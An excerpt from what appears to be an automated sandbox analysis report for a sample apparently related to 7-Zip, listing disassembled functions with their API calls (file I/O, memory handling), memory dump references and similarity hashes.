                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f4bf5ef788e6728e8579e5dfc2a785cb0374665964cbcc9bd9e207323b06e63
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15119462742A8284DF90EF25D8947E82362E746B98F5C8435DE0D4B361EF39C8CAC310
                                                                                                                                                                                                                                                                            Function 006A2E24 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A2E47
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A2E57
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A2EA4
                                                                                                                                                                                                                                                                              • Part of subcall function 006A2CFC: fputs.MSVCRT ref: 006A2D41
                                                                                                                                                                                                                                                                              • Part of subcall function 006A2CFC: fputs.MSVCRT ref: 006A2DCF
                                                                                                                                                                                                                                                                              • Part of subcall function 006A2CFC: free.MSVCRT ref: 006A2DFF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$free
                                                                                                                                                                                                                                                                            • String ID: =
                                                                                                                                                                                                                                                                            • API String ID: 3873070119-2525689732
                                                                                                                                                                                                                                                                            • Opcode ID: 4cca910cc9feef97d39b55c90a06b9effa51fec30a6b783ec7096b57ced3bdf6
                                                                                                                                                                                                                                                                            • Instruction ID: 4cd3f7ab7dd50d7005079049096472abcefaabdcf7ab10c7108d0a930f91c333
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cca910cc9feef97d39b55c90a06b9effa51fec30a6b783ec7096b57ced3bdf6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24F0679234490140DF20F766E9A137E5323AB86FF4F049315AD6E177A8DF28C9568705
                                                                                                                                                                                                                                                                            Function 006949B0 Relevance: 6.4, APIs: 5, Instructions: 106COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00694A5C
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00694A67
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00694AE4
                                                                                                                                                                                                                                                                              • Part of subcall function 00663314: memmove.MSVCRT ref: 00663339
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00694B0F
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00694B1A
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: malloc.MSVCRT ref: 00662134
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: _CxxThrowException.MSVCRT ref: 0066214F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3352498445-0
                                                                                                                                                                                                                                                                            • Opcode ID: ffa01df610a78eb8c6bf6cbd45b0887f3d376cc6246ea700225451970a264df5
                                                                                                                                                                                                                                                                            • Instruction ID: 89eb5773580efc28a4127590506f899cb170055a445ef4fca1d367093e6f1ccd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffa01df610a78eb8c6bf6cbd45b0887f3d376cc6246ea700225451970a264df5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B041A033245B8591CF50EF26D4507AD6766FB86B84F481136EB8E47B28DF38C596C318
                                                                                                                                                                                                                                                                            Function 006AE120 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                                                                                                                                                                                                                            • Instruction ID: e4916f49ea7a1fd2612063f7bb1528c4b1eeac1c983f44665c1f28372943eb91
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A315171214B41C6EB00EF58E89076A77B2F385B64F504226E6AD537B4DB3EC855CF41
                                                                                                                                                                                                                                                                            Function 00662320 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$fputsmemmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4106585527-0
                                                                                                                                                                                                                                                                            • Opcode ID: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                                                                                                                                                                                                                            • Instruction ID: 442cfb6567e40fc393633f4f9742a93b2b0e5d3478d52efa497c8c9bfd3566f1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4701656330884191DF60AB25E86156EA722E7C6BF4F045321FA6F977F8DE28C687C704
                                                                                                                                                                                                                                                                            Function 006668A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesFilefree
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1936811914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                                                                                                                                                                                                                            • Instruction ID: b3baea71887ece78f1b8fbd7a946e4aed561637626c50cf525442fa9e53263a4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26012B3230470281C630AB21E59037E572B9BC67F0F180325BE6D973E4CE25CD879705
                                                                                                                                                                                                                                                                            Function 00667D4C Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesFilefree
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1936811914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
                                                                                                                                                                                                                                                                            • Instruction ID: 9a79105ffc7ecd1cf7517a4f8a375ceeb26d4b831ee04071aac406185a08a773
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29F0A466308A0081CA70AB74E9A03BD56269FCA7F9F540720EB79977F5DF14CA868740
                                                                                                                                                                                                                                                                            Function 00683E14 Relevance: 5.1, APIs: 4, Instructions: 142COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-0
                                                                                                                                                                                                                                                                            • Opcode ID: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
                                                                                                                                                                                                                                                                            • Instruction ID: 0186d39235331bff5b9e1c12d0cd7338942148374bf0a48eb47f62e841e56b90
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36519D72604A9097CA70EF16E48029DB362F789FD4F40422AEB8E47B59DF38D5A5CB44
                                                                                                                                                                                                                                                                            Function 00689BCC Relevance: 5.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: c672974581852c8ab8e8e4232f116f9865b8037c8c9b18d6af4eac83a37c9762
                                                                                                                                                                                                                                                                            • Instruction ID: 1aea91c35d3a895d3d0af6856f07ac63a62926f3664ae9a64b411d27b65eee40
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c672974581852c8ab8e8e4232f116f9865b8037c8c9b18d6af4eac83a37c9762
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B731A36371568486CB60EF15E49046EA7A2F7C97A4B588339FF4E47758DB38C882C714
                                                                                                                                                                                                                                                                            Function 0068A9FC Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                                                                                                                            • Instruction ID: c774cacb85923430d4edaaa2a34fe29869c0d545ddb263115c0b119e706997a7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3211A77120894051EA50FA64E5512AA9752EBD23F4F401326BFAE83AF9DF18CD4BCB04
                                                                                                                                                                                                                                                                            Function 0068CF80 Relevance: 5.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ExceptionThrowmemmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3934437811-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                                                                                                                                                            • Instruction ID: 7ff10f91ffe66382abdb266bf4689360b3e40a59580a511bb52ad13009b7cc31
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB11B4637046C08BDB60AF25E85039AB712EB527E8F480315AFAD077E9DF78C50AC710
                                                                                                                                                                                                                                                                            Function 006801A8 Relevance: 5.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                                                                                                                            • Instruction ID: 6c65b25f07d214c48c6cec9ca390965234f92d6879347d08152ffd0d33ca619d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C01CC7220894040CAA0FB11E56516ED323EBC67E4F4413157F5E577A9CF24C64AC708
                                                                                                                                                                                                                                                                            Function 00668CDC Relevance: 4.6, APIs: 3, Instructions: 75fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 006689D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 006689EA
                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE ref: 00668D51
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32 ref: 00668DA4
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00668DB2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateFile$CloseHandlefree
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 210839660-0
                                                                                                                                                                                                                                                                            • Opcode ID: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                                                                                                                            • Instruction ID: 21eab3a1ec29a975b21b5cfcad4061706dfdbed2b2901f19ac5670dee942c5f6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D621B0332046819AC7709F25B85169AAB25F7967F4F540325EFB553BE4CF39C8A6CB00
                                                                                                                                                                                                                                                                            Function 006A2CFC Relevance: 4.6, APIs: 3, Instructions: 70COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00663274: memmove.MSVCRT ref: 006632AC
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A2D41
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A2DCF
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A2DFF
                                                                                                                                                                                                                                                                              • Part of subcall function 00662300: fputc.MSVCRT ref: 00662311
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$fputcfreememmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1158454270-0
                                                                                                                                                                                                                                                                            • Opcode ID: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
                                                                                                                                                                                                                                                                            • Instruction ID: dd027366060c61f66a02931cfa340d40a293ac0c4315c4558084887e596371aa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 872192A2240A0381CF20FF25E87135E6362EB85BE4F449225EA5F57769DF2CC9418B44
                                                                                                                                                                                                                                                                            Function 0066CE1C Relevance: 3.9, APIs: 3, Instructions: 178COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3796167841-0
                                                                                                                                                                                                                                                                            • Opcode ID: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                                                                                                                                                            • Instruction ID: 8445d8c8dfe867d9cad6a8e38b4c265dc6beaa9c44205bbbaa41f3aa85fc9627
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1551C233710B54A7DB258E7AD6407B923A2FB487A8F14012ADF4A87B50DB39D8A6C740
                                                                                                                                                                                                                                                                            Function 00662300 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
